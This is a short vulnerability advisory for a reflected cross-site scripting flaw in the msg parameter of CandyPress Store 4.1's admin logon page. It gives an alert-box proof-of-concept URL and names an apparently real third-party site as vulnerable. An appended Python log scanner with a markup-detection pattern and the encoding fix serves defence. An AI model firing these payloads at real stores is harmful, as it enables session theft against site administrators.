CandyPress Store 4.1 - XSS

2007-10-21 / 2007-10-22
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Product: CandyPress Store
Version: 4.1
Bug Kind: XSS
Vendor Site: http://www.candypress.com
Discovered by: Snoop Security Researching Committee
We Are: it's an Underground...so ssshh!!! no one knows us...
This bug belongs to: Snoop Security and darkness_king
www.snoop-security.com

About CandyPress:
CandyPress Store is an eCommerce solution based on popular Microsoft technologies. It is designed to run on an IIS web server that is ASP and VBScript enabled. In addition, the software is designed to work with SQL Server or MS Access databases.

The bug is in the msg parameter of the admin logon page, which is reflected into the response:
/admin/logon.asp?msg=Snoop Security

Script markup passed in the same parameter is reflected as well:
/admin/logon.asp?msg=%3Cscript%3E%20alert('snoop%20security');%20%3C/script%3E

Some example vulnerable pages:
http://www.ineedfrom.com/admin/logon.asp?msg=%3Cscript%3E%20alert('snoop%20security');%20%3C/script%3E
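An added example, not part of the original advisory or of CandyPress: a Python check that scans IIS W3C logs for requests to /admin/logon.asp whose msg parameter decodes to HTML markup. The log lines and client addresses are constructed, and the MARKUP pattern is an assumed heuristic.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C sample (not real traffic); client IPs are documentation ranges.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2007-10-22 09:14:02 192.0.2.10 GET /admin/logon.asp msg=Invalid+password 200
2007-10-22 09:15:40 198.51.100.7 GET /admin/logon.asp msg=%3Cscript%3E%20alert('x');%20%3C/script%3E 200
2007-10-22 09:16:05 198.51.100.7 GET /admin/logon.asp msg=%253Cimg%2520src%253Dx%253E 200
2007-10-22 09:17:11 192.0.2.10 GET /default.asp - 200
"""

# Assumed heuristic: tag delimiters, quotes, javascript: URLs, inline event handlers.
MARKUP = re.compile(r"[<>\"]|javascript:|\bon\w+\s*=", re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded markup (%253C) is also seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_suspicious_msg(log_text, stem="/admin/logon.asp"):
    """Return (date, time, client_ip, decoded_msg) for hits whose msg carries markup."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if row.get("cs-uri-stem", "").lower() != stem:
            continue
        # Split on '&' by hand: the payload may contain a literal ';'.
        for pair in row.get("cs-uri-query", "-").split("&"):
            name, _, raw = pair.partition("=")
            if name.lower() == "msg" and MARKUP.search(fully_decode(raw)):
                hits.append((row.get("date"), row.get("time"),
                             row.get("c-ip"), fully_decode(raw)))
    return hits

if __name__ == "__main__":
    for hit in find_suspicious_msg(SAMPLE_LOG):
        print(hit)
```

Log review only finds past attempts; the fix is on the server side, HTML-encoding msg (Server.HTMLEncode in Classic ASP) before it is written into the logon page.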

